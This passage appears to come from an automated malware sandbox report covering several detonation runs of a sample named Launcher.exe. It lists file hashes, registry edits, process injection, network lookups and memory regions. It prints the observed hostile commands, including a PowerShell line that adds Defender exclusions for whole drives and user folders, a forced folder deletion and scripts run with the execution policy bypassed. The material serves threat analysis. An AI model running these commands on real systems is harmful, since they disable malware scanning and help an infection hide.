| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar8D56.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar90DA.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2632-78-0x0000000073450000-0x00000000739FB000-memory.dmp
memory/2632-158-0x00000000024E0000-0x0000000002520000-memory.dmp
memory/2632-170-0x0000000073450000-0x00000000739FB000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1527s
Max time network
1515s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4388 wrote to memory of 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
memory/1264-0-0x0000000002B00000-0x0000000002B36000-memory.dmp
memory/1264-1-0x0000000072B20000-0x00000000732D0000-memory.dmp
memory/1264-3-0x00000000056E0000-0x0000000005D08000-memory.dmp
memory/1264-4-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-2-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-5-0x0000000005660000-0x0000000005682000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ud2qsq20.gwy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1264-11-0x0000000005D80000-0x0000000005DE6000-memory.dmp
memory/1264-12-0x0000000005DF0000-0x0000000005E56000-memory.dmp
memory/1264-17-0x0000000005F60000-0x00000000062B4000-memory.dmp
memory/1264-18-0x0000000006430000-0x000000000644E000-memory.dmp
memory/1264-19-0x0000000006470000-0x00000000064BC000-memory.dmp
memory/1264-20-0x0000000002AF0000-0x0000000002B00000-memory.dmp
memory/1264-21-0x00000000075F0000-0x0000000007622000-memory.dmp
memory/1264-22-0x000000006F460000-0x000000006F4AC000-memory.dmp
memory/1264-32-0x00000000069F0000-0x0000000006A0E000-memory.dmp
memory/1264-33-0x0000000007630000-0x00000000076D3000-memory.dmp
memory/1264-34-0x0000000007DA0000-0x000000000841A000-memory.dmp
memory/1264-35-0x0000000007750000-0x000000000776A000-memory.dmp
memory/1264-36-0x00000000077D0000-0x00000000077DA000-memory.dmp
memory/1264-37-0x0000000007A10000-0x0000000007AA6000-memory.dmp
memory/1264-38-0x0000000007940000-0x0000000007951000-memory.dmp
memory/1264-39-0x0000000007980000-0x000000000798E000-memory.dmp
memory/1264-40-0x0000000007990000-0x00000000079A4000-memory.dmp
memory/1264-41-0x00000000079D0000-0x00000000079EA000-memory.dmp
memory/1264-42-0x00000000079C0000-0x00000000079C8000-memory.dmp
memory/1264-45-0x0000000072B20000-0x00000000732D0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win7-20240221-en
Max time kernel
1795s
Max time network
1820s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
Files
memory/2396-4-0x000000001B2A0000-0x000000001B582000-memory.dmp
memory/2396-6-0x0000000002460000-0x0000000002468000-memory.dmp
memory/2396-5-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2396-7-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2396-9-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-10-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-11-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-12-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2396-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:53
Platform
win10v2004-20240226-en
Max time kernel
1792s
Max time network
1850s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x32c 0x4b4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1tjdkzw.1sj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3772-9-0x000001A1A9A30000-0x000001A1A9A52000-memory.dmp
memory/3772-10-0x00007FFEEDF80000-0x00007FFEEEA41000-memory.dmp
memory/3772-11-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-12-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-13-0x000001A1C20C0000-0x000001A1C20D0000-memory.dmp
memory/3772-16-0x00007FFEEDF80000-0x00007FFEEEA41000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win7-20240220-en
Max time kernel
1563s
Max time network
1570s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
